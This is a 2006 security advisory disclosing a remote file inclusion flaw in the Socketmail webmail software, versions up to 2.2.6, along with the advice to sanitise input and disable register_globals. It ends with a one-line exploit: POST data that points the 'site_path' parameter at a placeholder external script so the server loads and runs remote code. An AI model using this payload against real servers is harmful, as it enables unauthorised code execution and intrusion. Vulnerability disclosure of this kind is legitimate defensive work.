[MajorSecurity]Socketmail <= 2.2.6 - Remote File Include Vulnerability --------------------------------------------------------
Software: Socketmail Version: <=2.2.6 Type: Remote File Include Vulnerability Date: May, 25th 2006 Vendor: Creative Digital Resources Page: http://socketmail.com Risc: High Credits: ---------------------------- 'Aesthetico' http://www.majorsecurity.de Affected Products: ---------------------------- Socketmail Lite 2.2.6 and prior Socketmail Pro 2.2.6 and prior Description: ---------------------------- SocketMail is a powerful, scalable and fully customisable e-mail solution. Ideal messaging solution for sizes web site and enterprises. Requirements: ---------------------------- register_globals = On magic_quotes = On Vulnerability: ---------------------------- Input passed to the "site_path" parameter in "index.php" and "inc-common.php" is not properly verified, before it is used to include files. This can be exploited to execute arbitrary code by including files from external resources. Solution: ---------------------------- Edit the source code to ensure that input is properly sanitised. Set "register_globals" to "Off". Exploitation: ---------------------------- Post data: site_path=http://www.yourspace.com/yourscript.php?
